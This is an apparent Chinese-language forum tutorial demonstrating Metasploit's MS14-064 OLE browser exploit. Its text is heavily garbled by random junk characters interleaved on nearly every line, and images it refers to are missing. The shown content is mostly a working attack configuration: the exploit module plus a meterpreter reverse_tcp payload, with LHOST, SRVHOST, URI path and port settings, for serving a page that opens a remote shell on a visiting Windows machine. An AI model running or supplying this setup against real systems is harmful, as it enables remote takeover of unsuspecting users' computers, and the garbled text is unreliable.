9 m! ?. M- p/ u: H6 M. M$ g
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示' _% b/ P) _* F, r# v. p
% O# s: M; a6 D: _/ u! X) L7 |3 R7 V1 f
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
4 T5 a& p* q- R0 E
e8 p8 B) o! o/ I1 x$ n9 s
5 F$ o1 }8 }! o% W: L( M 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp+ A! M( @# _& g! ?9 j4 E
# }- S. _! F+ l U8 q3 O+ v
, N7 H; Z3 h3 F+ b$ R& f
set AllowPowershellPrompt true% i {) C) _0 v* q" S3 i7 \
% ~3 z% R6 K) ~- }( V
+ U1 z2 |3 e9 e8 I7 D
Set LHOST 192.168.0.1096 `# K9 [: L1 Q0 i
- O# c c. r" m- W' g4 b* \* D+ K8 S4 {5 w% S7 u; c
set SRVHOST 192.168.0.109$ ]% C3 J' Q1 z6 q! G
( b% K6 l! K; l8 P& g$ ?& u
6 v, }) s0 L: ^' N+ f Set uripath share7 H2 h+ b6 M# g# ^8 I2 h2 M( b
3 R( ~1 I" t- }% |; j
3 S1 \. ^" O2 D, Y- h1 h. ?$ U Set srvport 80
% c7 Y- O+ i* G) ~2 @% Z; X' I
- r' s/ ^$ u1 E) i2 F" r, x& h
0 ^- C1 u8 N" D8 R& Q8 ^% T
7 R) n9 l7 B! ?4 Q' V" i0 P% O
# F! Z3 ]+ Y5 m+ f; @& t9 `* `. |) n8 |/ F* h& ^! }
; u! t: x: Z A! V
4 S- I6 e% d& }$ j2 s0 W% t; @; n5 ?1 H1 O- p9 n2 f* _- ^
" C" `7 p* F+ H5 I' Q; J8 M
, d S0 h- b) n9 e
9 l2 }9 o5 g0 f
8 \) z* o9 E; c& Y! [- A: w
5 Q! j* o4 ^8 F2 ~8 Y' w/ M1 `
: a" }$ h+ U- p4 R# P2 m ) t& M8 \0 N' \; q6 l! U" `
0 n% _' W6 l' I7 u" U$ j
/ q" | c& q& l' }6 x9 \; S 下面我们来访问本地地址如图:0 P; g: Z" Y6 n6 Q* b7 \% k2 `
5 [. ?7 i& O( z, m4 k
7 m6 H% ?; F$ b t # {, u: k* R3 K7 O' C, J* O0 d- N
7 _8 M8 X, `3 K' t3 d* ]5 c
M/ p6 [, I, C3 `! A& g' T* n ( _/ _8 O" N3 L3 E$ m. M, x
( a) A: }5 K3 W2 R u+ x4 x+ M' k6 v1 F/ O* ?' }
+ U$ J8 W" A! s: F; h: ^3 l